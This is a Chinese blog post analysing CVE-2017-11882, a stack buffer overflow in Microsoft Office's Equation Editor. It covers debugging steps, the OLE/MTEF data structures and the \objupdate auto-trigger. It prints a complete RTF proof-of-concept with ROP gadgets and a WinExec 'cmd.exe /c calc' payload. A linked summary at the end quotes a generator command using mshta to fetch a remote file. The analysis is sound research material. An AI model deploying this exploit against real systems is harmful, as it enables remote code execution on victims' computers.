CVE-2017-11882漏洞分析

最新推荐文章于 2025-02-24 14:07:23 发布
最新推荐文章于 2025-02-24 14:07:23 发布
阅读量1.7k 收藏 2
点赞数
分类专栏: 漏洞利用 文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/datouyu0824/article/details/115042237
版权

1. 软件简介

Office 是一套由微软公司开发的办公软件,为Windows和AppleMacintosh操作系统而开发。与办公室应用程序一样,它包括联合的服务器和基于互联网的服务。

Eqnedt32.exe为各版本的微软Office公式编辑器组件

2. 漏洞成因

CVE-2017-11882属于缓冲区溢出类型漏洞,产生漏洞原因于EQNEDT32.EXE(微软office自带公式编辑器)进程在读入包含MathType的ole数据时,在拷贝公式字体名称(Font Name数据)时没有对名称长度进行校验,导致缓冲区溢出。通过覆盖函数的返回地址,可执行任意代码

3. 利用过程

1. 定位溢出点

搭建环境,windows7 32位+office 2007 sp3

生成poc文件,打开会弹出计算器

找到EQNEDT32.EXE

设置注册表项,便于调试

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Image File Execution Options\EQNEDT32.EXE:

打开poc文档,程序运行被x32捕获

OLE(Object Linking and Embedding,对象连接与嵌入),是一种面向对象的技术,利用这种技术可开发可重复使用的软件组件(COM)。OLE从多媒体借鉴而来,是Windows的一组服务功能,提供了一种以源于不同应用软件的信息建立复合文档的强有力方法。

在WinExec函数下断点

此时已经是处于shellcode里,栈回溯,返回地址保存在0x12F1D0,为溢出点

查看调用返回地址为0x00430C18,下断点

2. 分析触发漏洞函数

重新打开poc文档,查看栈调用的函数为0x004115A7

在0x004115A7下断点,重新运行,单步分析是哪里导致了返回地址被覆盖

F8 0x41160F后直接跳转到call WinExec,进入函数分析

该函数有三个参数,第一个为字符串地址0x12f350,第二个为0,第三个参数为栈地址0x12F1EC

进入函数,返回地址为0x4115DB

单步运行分析函数逻辑,在串拷贝时未对长度进行判断,从而导致栈溢出覆盖了返回地址

为0x430C12

执行了cmd命令,栈中为上次层函数的参数0x12f350  /c calc.exe命令地址

及0显示方式 SW_HIDE

3. 分析数据结构

 

漏洞出现在模块EQNEDT32.EXE中,该模块以OLE技术(Object Linking and Embedding,对象链接与嵌入)将公式嵌入在Office文档内。当插入和编辑数学公式时,EQNEDT32.EXE并不会被作为Office进程(如Word等)的子进程创建,而是以单独的进程形式存在。这就意味着对于word、excel等Office进程的保护机制,无法阻止EQNEDT32.EXE这个进程被利用。漏洞存在于EQNEDT32.EXE处理Office OLE Equation对象中标记为字体名称记录的字节流中,如果Equation对象中存在标记为字体名称的超长字节流,则程序在处理该字符串的过程,会由于判断字符串长度而发生栈溢出漏洞。

 Equation Native数据流= EQNOLEFILEHDR + MTEFData,其中

MTEFData = MTEFheader + MTEF Byte Stream

EQNOLEFILEHDR头结构(共28字节)如下

 struct EQNOLEFILEHDR {

  WORD    cbHdr;      // 格式头长度,固定为0x1C。

  DWORD   version;    // 固定为0x00020000。

  WORD    cf;          // 该公式对象的剪贴板格式。

  DWORD   cbObject;  // MTEF数据的长度,不包括头部。

  DWORD   reserved1; // 未公开

  DWORD   reserved2; // 未公开

  DWORD   reserved3; // 未公开

  DWORD   reserved4; // 未公开

};

  1.          {\*\comment MTEF Header }  
  2. 1c00     {\*\comment MTEF Header Size -> 0x1C = 28 }  
  3. 00000200  
  4. 9ec4  
  5. a9000000  //MTEF数据长度 0xA9个字节 MTEF开始  
  6.   
  7. 00000000  
  8. c8a75c00  
  9. c4ee5b00  
  10. 00000000  
  11.   
  12.           // MTEF header (version 2 and later)  
  13. 03        {\*\comment Version }  
  14. 01        {\*\comment Generating Platform }  
  15. 01        {\*\comment Generating Product }  
  16. 03        {\*\comment Product Version }  
  17. 0A        {\*\comment Product S  
  18.   
  19. 0a        // SIZE  
  20. 01          
  21. 08        // FONT  
  22. 5a        // TypeFace number  
  23. 5a        // Style  
  24.   
  25. // FontName(null - terminated)  
  26. 636d642e657865202f632063616c632e65786520414141414141414141414141414141414141414141414141120c4300 

0x1C

0xA9

RTF格式

其中,\objupdate控制字来保证OLE对象的自动更新和加载,从而触发漏洞代码执行。默认状态下Office文档中的OLE Object需要用户双击才能生效。将OLE Object的属性为自动更新,这样无需交互,点击打开文档后OLE Object对象会生效,从而执行恶意代码。

4. 构造shellcode

经过尝试,发现溢出点后不能有额外的数据覆盖,否则会覆盖上层函数参数引发异常,font name到溢出点的shellcode最大可使用长度为0x28个字节,改为打开记事本

4. POC

  1. {\rtf1  
  2.     { Hello, calculator! }  
  3.     {\object \objemb \objupdate \objw1 \objh1  
  4.         {\*\objclass Equation.3}  
  5.         {\*\objdata  
  6.             01050000 {\*\comment OLE Version }  
  7.             02000000 {\*\comment Format ID -> 0x02 = Embedded Object }  
  8.             0b000000 {\*\comment ClassName.Length -> 0x0B = 11 }  
  9.             4571756174696f6e2e3300 {\*\comment ClassName.String -> "Equation.3\x00" }  
  10.             00000000 {\*\comment TopicName.Length -> 0x00 }  
  11.             00000000 {\*\comment Item.Length -> 0x00 }  
  12.             00140000 {\*\comment NativeData.Size -> 0x1400 = 5120 }  
  13.   
  14.             D0CF11E0A1B11AE1000000000000000000000000000000003E000300FEFF0900060000000000000000000000010000000100000000000000001000000200000001000000FEFFFFFF0000000000000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFDFFFFFF04000000FEFFFFFF05000000FEFFFFFF060000000700000008000000FEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF52006F006F007400200045006E00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500FFFFFFFFFFFFFFFF0200000002CE020000000000C000000000000046000000000000000000000000304E4E74DF0AD30103000000C00900000000000001004F006C00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000A000201FFFFFFFFFFFFFFFFFFFFFFFF000000000000000000000000000000000000000000000000000000000000000000000000000000001400000000000000010043006F006D0070004F0062006A00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000004000000FFFFFFFF00000000000000000000000000000000000000000000000000000000000000000000000001000000660000000000000003004F0062006A0049006E0066006F0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000012000200FFFFFFFFFFFFFFFFFFFFFFFF000000000000000000000000000000000000000000000000000000000000000000000000030000000600000000000000FEFFFFFF02000000FEFFFFFFFEFFFFFF05000000060000000700000008000000090000000A0000000B0000000C0000000D0000000E0000000F0000001000000011000000120000001300000014000000FEFFFFFF160000001700000018000000190000001A0000001B0000001C0000001D0000001E0000001F00000020000000210000002200000023000000240000002500000026000000FEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF010000020800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100FEFF030A0000FFFFFFFF02CE020000000000C000000000000046170000004D6963726F736F6674204571756174696F6E20332E30000C0000004453204571756174696F6E000B0000004571756174696F6E2E3300F439B271000000000000000000000000000000000000000000000000000000000000000000000000000000000300040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFF030000000400000001000000FFFFFFFF00000000000000007349000034060000040400000100090000030202000004001C00000000000500000009020000000005000000020101000000050000000102FFFFFF00050000002E0118000000050000000B0200000000050000000C02A005A0421200000026060F001A00FFFFFFFF000010000000C0FFFFFFC0FFFFFF60420000600500000B00000026060F000C004D617468547970650000C00008000000FA0200000800000000000000040000002D010000050000001402F8016000050000001302F801404208000000FA0200001000000000000000040000002D010100050000001402C0034000050002004F006C0065005000720065007300300030003000000000000000000000000000000000000000000000000000000000000000000000000000000000000000180002010300000005000000FFFFFFFF000000000000000000000000000000000000000000000000000000000000000000000000040000002C040000000000004500710075006100740069006F006E0020004E00610074006900760065000000000000000000000000000000000000000000000000000000000000000000000020000200FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000001500000057040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001302C00360421C000000FB0280FE0000000000009001000000000402001054696D6573204E657720526F6D616E00FEFFFFFFE2250A7A00000A0000000000040000002D0102000B000000320A4C05503C0800000031313131313131310C000000320A4C05D0340A000000313131313131313131310C000000320A4C05502D0A000000313131313131313131310C000000320A4C05D0250A000000313131313131313131310C000000320A4C05501E0A000000313131313131313131310C000000320A4C05D0160A000000313131313131313131310C000000320A4C05500F0A000000313131313131313131310C000000320A4C05D0070A000000313131313131313131310C000000320A4C0550000A000000313131313131313131310B000000320A8403503C0800000031313131313131310C000000320A8403D0340A000000313131313131313131310C000000320A8403502D0A000000313131313131313131310C000000320A8403D0250A000000313131313131313131310C000000320A8403501E0A000000313131313131313131310C000000320A8403D0160A000000313131313131313131310C000000320A8403500F0A000000313131313131313131310C000000320A8403D0070A000000313131313131313131310C000000320A840350000A000000313131313131313131310B000000320A6601503C0800000031313131313131310C000000320A6601D0340A000000313131313131313131310C000000320A6601502D0A000000313131313131313131310C000000320A6601D0250A000000313131313131313131310C000000320A6601501E0A000000313131313131313131310C000000320A6601D0160A000000313131313131313131310C000000320A6601500F0A000000313131313131313131310C000000320A6601D0070A000000313131313131313131310C000000320A660150000A000000313131313131313131310A00000026060F000A00FFFFFFFF0100000000001C000000FB021000070000000000BC02000000000102022253797374656D000048008A0100000A000600000048008A01FFFFFFFFD4EF1800040000002D01030004000000F00102000300000000000000000000000000000000000000000000000000  
  15.   
  16.             {\*\comment MTEF Header }  
  17.             1C00 {\*\comment MTEF Header Size -> 0x1C = 28 }  
  18.             00000200  
  19.             A8C4  
  20.             3B040000  
  21.   
  22.             00000000  
  23.             E0A06600  
  24.             ECE76500  
  25.             00000000  
  26.   
  27.             03 {\*\comment Version }  
  28.             01 {\*\comment Generating Platform }  
  29.             01 {\*\comment Generating Product }  
  30.             03 {\*\comment Product Version }  
  31.             0A {\*\comment Product Subversion }  
  32.   
  33.             0A {\*\comment TYPESIZE Record }  
  34.             01  
  35.   
  36.             05 {\*\comment MATRIX Record }  
  37.             01  
  38.             01  
  39.             01  
  40.             1C {\*\comment size1 -> Copy 8 bytes to EBP-0x14 }  
  41.             94 {\*\comment size2 -> Copy 38 bytes to EBP-0x0C }  
  42.   
  43.             636D642E {\*\comment EBP-0x14 -> "cmd." }  
  44.             65786520 {\*\comment EBP-0x10 -> "exe " }  
  45.             2F632063 {\*\comment EBP-0x0C -> "/c c" }  
  46.             616C6300 {\*\comment EBP-0x08 -> "alc\x00" }  
  47.             00000000 {\*\comment EBP-0x04 }  
  48.             19000000 {\*\comment EBP-0x00: 0x19 = (0x32 / 2) }  
  49.             3AC74400 {\*\comment Return Address -> Base + 0x0004C73A } {\*\asmcomment add esp, 4; retn; }  
  50.   
  51.             285B4500 {\*\comment Writable Address -> Base + 0x00055B28 }  
  52.             B60E4100 {\*\comment Increase EAX -> Base + 0x00010EB6 } {\*\asmcomment add eax, ebp; retn 2; }  
  53.             B60E4100 {\*\comment Increase EAX -> Base + 0x00010EB6 } {\*\asmcomment add eax, ebp; retn 2; }  
  54.             0000  
  55.             4BED4000 {\*\comment Push EAX and Call WinExec -> Base + 0x0000ED4B }  
  56.   
  57.             00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  
  58.   
  59.             {\*\comment End of the equation }  
  60.   
  61.             000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  
  62.   
  63.             01050000 {\*\comment OLE Version }  
  64.             05000000 {\*\comment Format ID -> 0x05 = Presentation Object with a ClassName }  
  65.             0D000000 {\*\comment ClassName.Length -> 0x0D = 13 }  
  66.             4D45544146494C455049435400734900 {\*\comment ClassName.String -> "METAFILEPICT\x00" }  
  67.   
  68.             {\*\comment Presentation Data }  
  69.             00CCF9FFFF0C04000008007349340600000100090000030202000004001C00000000000500000009020000000005000000020101000000050000000102FFFFFF00050000002E0118000000050000000B0200000000050000000C02A005A0421200000026060F001A00FFFFFFFF000010000000C0FFFFFFC0FFFFFF60420000600500000B00000026060F000C004D617468547970650000C00008000000FA0200000800000000000000040000002D010000050000001402F8016000050000001302F801404208000000FA0200001000000000000000040000002D010100050000001402C0034000050000001302C00360421C000000FB0280FE0000000000009001000000000402001054696D6573204E657720526F6D616E00FEFFFFFF682C0A7800000A0000000000040000002D0102000B000000320A4C05503C0800000031313131313131310C000000320A4C05D0340A000000313131313131313131310C000000320A4C05502D0A000000313131313131313131310C000000320A4C05D0250A000000313131313131313131310C000000320A4C05501E0A000000313131313131313131310C000000320A4C05D0160A000000313131313131313131310C000000320A4C05500F0A000000313131313131313131310C000000320A4C05D0070A000000313131313131313131310C000000320A4C0550000A000000313131313131313131310B000000320A8403503C0800000031313131313131310C000000320A8403D0340A000000313131313131313131310C000000320A8403502D0A000000313131313131313131310C000000320A8403D0250A000000313131313131313131310C000000320A8403501E0A000000313131313131313131310C000000320A8403D0160A000000313131313131313131310C000000320A8403500F0A000000313131313131313131310C000000320A8403D0070A000000313131313131313131310C000000320A840350000A000000313131313131313131310B000000320A6601503C0800000031313131313131310C000000320A6601D0340A000000313131313131313131310C000000320A6601502D0A000000313131313131313131310C000000320A6601D0250A000000313131313131313131310C000000320A6601501E0A000000313131313131313131310C000000320A6601D0160A000000313131313131313131310C000000320A6601500F0A000000313131313131313131310C000000320A6601D0070A000000313131313131313131310C000000320A660150000A000000313131313131313131310A00000026060F000A00FFFFFFFF0100000000001C000000FB021000070000000000BC02000000000102022253797374656D000048008A0100000A000600000048008A01FFFFFFFFD4EF1800040000002D01030004000000F0010200030000000000  
  70.         }  
  71.     }  
  72. }  

5. 结语

CVE-2017-11882是一个非常经典的栈溢出漏洞。上次出现这么典型的office栈溢出漏

洞是著名的CVE-2012-0158,当涉及栈的拷贝操作时,要做到对长度的判断及限制就可以杜绝此类漏洞的发生。

    Office漏洞大部分都是其组件产生的,从而不需要绕过office的本身的保护机制,同时这些漏洞造成的危害也是巨大的,是APT攻击的常用手段,多学习吧

 

 

CVE-2017-11882 Office漏洞
4SecNet团队专栏
03-16 885
简介 CVE-2017-11882属于缓冲区溢出类型漏洞,造成漏洞的原因是,EQNEDT32.EXE(微软office自带公式编辑器)进程在读入包含MathType的ole数据时,在拷贝公式字体名称(Font Name数据)时没有对名称长度进行校验,导致缓冲区溢出。通过覆盖函数的返回地址,可执行任意代码。 深究其中的具体原因还要对ole文件的数据格式进行了解: ole文件的数据格式 ...
CVE-2017-11882
weixin_44932880的博客
01-16 1856
CVE-2017-11882 CVE-2017-11882是微软公布的一个远程执行漏洞,office2017具有该漏洞。该漏洞的成因是EQNEDT32.EXE进程在读入包含MathType的ole数据时,在拷贝公式字体名称时没有对名称长度进行校验,从而造成栈缓冲区溢出,是一个非常经典的栈溢出漏洞。 调试环境 windows7_sp1(有这个sp1才能安装vmtools) office 2007 x86 olldbg ida 先ida找到漏洞出现的地方 通过od动态调试查看出拷贝的是一个字符串”T
漏洞cve2017-11882
m0_64973256的博客
12-21 835
所以我们需要在EQNEDT32.exe中下断点,而不是word里面下断点。可以看到计算器的父进程是cmd,但是cmd的父进程存在PID,但是在列表中却找不到PID为1404的进程,卡顿许久,猜测或许是cmd父进程隐藏了自己或者启动时间太短,启动完自己结束。也就是这里是通过淹没返回地址到WinExec上,然后通过修改字符串控制WinExec的参数,启动cmd打开计算器实现。通过启动cmd,打开了计算器,而之后的的AAAA等都是传给计算器参数,是无效的。
「 网络安全常用术语解读 」通用漏洞披露CVE详解_cve漏洞
最新发布
jennycisp的博客
02-24 857
CVE全称是Common Vulnerabilities and Exposures,即通用漏洞披露,它是MITRE公司维护和更新的安全漏洞列表,列表中的每个条目都会有一个唯一的CVE编号,即CVE ID,供安全研究员和受攻击的软件供应商使用,以便确定和回应安全漏洞CVE条目包含了与CVE ID相关的漏洞的描述性数据(即简要描述和至少一个参考)。当前CVE累计收录了19万+个安全漏洞,具体的漏洞清单可以点击下载,访问密码6277。举例。
[漏洞样本分析]CVE-2017-11882
r250414958的博客
11-01 3499
环境: Win7(专业版) office 2003 sp3(完全版) 工具: Ollydbg IDA Pro PEid Kali-Linux metasploit POC来源: https://github.com/embedi/CVE-2017-11882 漏洞介绍: 安全公司Embedi最早报告了漏洞,他们在一个老旧的微软工具Equation Editor中的EQNEDT32...
CVE-2017-11882:Office内存破坏漏洞
Fly_鹏程万里
08-26 694
影响范围 MicrosoftOffice 2000 MicrosoftOffice 2003 MicrosoftOffice 2007 Service Pack 3 MicrosoftOffice 2010 Service Pack 2 MicrosoftOffice 2013 Service Pack 1 MicrosoftOffice 2016 利用条件 在影响范围内的应用 用户打开恶意Office 漏洞概述 CVE-2017-11882是微软公布的一个远程执行漏洞,该漏洞的成...
cve-2017-11882漏洞分析资料.zip
02-17
CVE-2017-11882漏洞分析:深入理解OLE技术与安全》 CVE-2017-11882是一个针对Microsoft Office的严重远程代码执行漏洞,它涉及到对象链接和嵌入(OLE)技术。OLE是Windows操作系统中的一种功能,允许不同应用程序...
浅谈Node.js CVE-2017-14849 漏洞分析(详细步骤)
10-19
【Node.js CVE-2017-14849 漏洞分析】 Node.js 是一个基于 Chrome V8 引擎的 JavaScript 运行时,它提供了高效的事件驱动、非阻塞 I/O 模型,使得开发高性能的网络应用变得简单。Express,则是建立在 Node.js 平台...
CVE-2017-7269-Echo-PoC:CVE-2017-7269回显PoC,用于远程入侵检测。
03-02
我们团队对此次发布CVE-2017-7269漏洞分析报告: ://ht-sec.org/cve-2017-7269-vulnerabilities/ DefaultPoC只能弹calc.exe ,现在修改成可以响应请求,命令格式为: CVE-2017-7269_remote_echo.py ip_address...
漏洞检测CVE-2017-7525---poc
01-20
### 漏洞检测CVE-2017-7525分析与PoC解析 #### 一、漏洞概述 CVE-2017-7525是Apache Struts框架中的一个远程代码执行漏洞。该漏洞允许攻击者通过精心构造的恶意请求来执行远程代码。Apache Struts是一款开源的MVC...
hikvision_CVE-2017-7921_auth_bypass_config_decryptor-main.zip
05-20
标题 "hikvision_CVE-2017-7921_auth_bypass_config_decryptor-main.zip" 指向的是一个与海康威视(Hikvision)设备相关的安全漏洞,具体是CVE-2017-7921认证绕过漏洞。这个压缩包可能包含一个工具或指南,用于解析...
CVE-2017-11882CVE-2017-11882(通杀Office 2003到2016)
03-04
CVE-2017-11882概述 从突破利用效果来看,它可以通杀Office 2003到2016的所有版本,并且整个攻击环境的内置非常简单。此突破是由Office软件里面的[公式编辑器]造成的,由于编辑器进程没有对举个例子,如果黑客利用这个漏洞,构造带有外壳后门的office文件,当普通用户打开这个office文件,则电脑可以被黑客直接控制。 影响版本: office 2003 office 2007 office 2010 office 2013 office 2016 用法 python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc 点击生成的“ test.doc”,顺利投放计算机工具。 python Command_CVE-2017-11882.py -c "mshta http://192.
陈年老洞CVE-2017-11882漏洞分析
WLINX
03-16 944
目录 漏洞简介 影响版本 Office基础 漏洞分析 获取POC 漏洞演示 漏洞定位 漏洞分析 漏洞简介 2017年11月14日,微软发布了11月份的安全补丁更新,其中比较引人关注的莫过于悄然修复了长达17年的Office远程代码执行(CVE-2017-11882)陈年老洞。该漏洞属于缓冲区溢出类型漏洞,影响目前流行的所有Office版本,产生漏洞原因于EQNEDT32.EXE...
漏洞分析CVE-2017-11882
airuihuan5211的博客
11-26 390
漏洞分析CVE-2017-11882 目录 漏洞分析CVE-2017-11882目录☛ 漏洞介绍☛ 漏洞分析☛ 1.漏洞分析环境与工具☛ 2.获取 Poc[点击????]☛ 3.复现漏洞☛ 4.分析漏洞☛ 5.漏洞利用☛ 6.利用漏洞2☛ 总结☛ 参考资料完成时间:2018-10-23 10:24:05 星期二 ☛ 漏洞介绍 安全公司Embedi最早报告了漏洞,其出现在...
【Windows】CVE-2017-11882漏洞利用
古月浪子的博客
02-09 3247
CVE-2017-11882是一个Office的漏洞,虽然该漏洞已经有补丁了,且杀毒软件也能查出利用了该漏洞的恶意文档,但是学习和复现该漏洞仍是一项令人受益颇多的过程 为了复现该漏洞,我们需要准备Office2016及以前的版本,这里我选择的是2016版本 利用漏洞的主要手段是,依靠公式编辑器中的缓冲区溢出执行短长度命令行以及Office自动在TEMP目录下临时释放附件的特性,达到执行任意代码的效果 导致漏洞的罪魁祸首就是一个叫EQNEDT32.EXE的程序,该文件的位置可以用任务管理器查看进程文件来定位
CVE-2017-11882复现及防御
hl1293348082的专栏
04-01 1984
本文作者:\xeb\xfe,加上之前的文章《一道 CTF 题 get 到的新姿势》完成两篇文章的任务,邀请加入知识星球,欢迎更多的人加入我们,一起交流、一起学习。 最新 Office 的 CVE-2017-11882,完美无弹窗,无视宏,影响 office 全版本。利用触发器 WebClient 服务从攻击者控制的 WebDav 服务器启动和执行远程文件。该脚本使用多个 OLE 对象创建简单的文档。这些对象利用 CVE-2017-11882,从而导致连续命令执行。 复现过程 实验环境: win.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值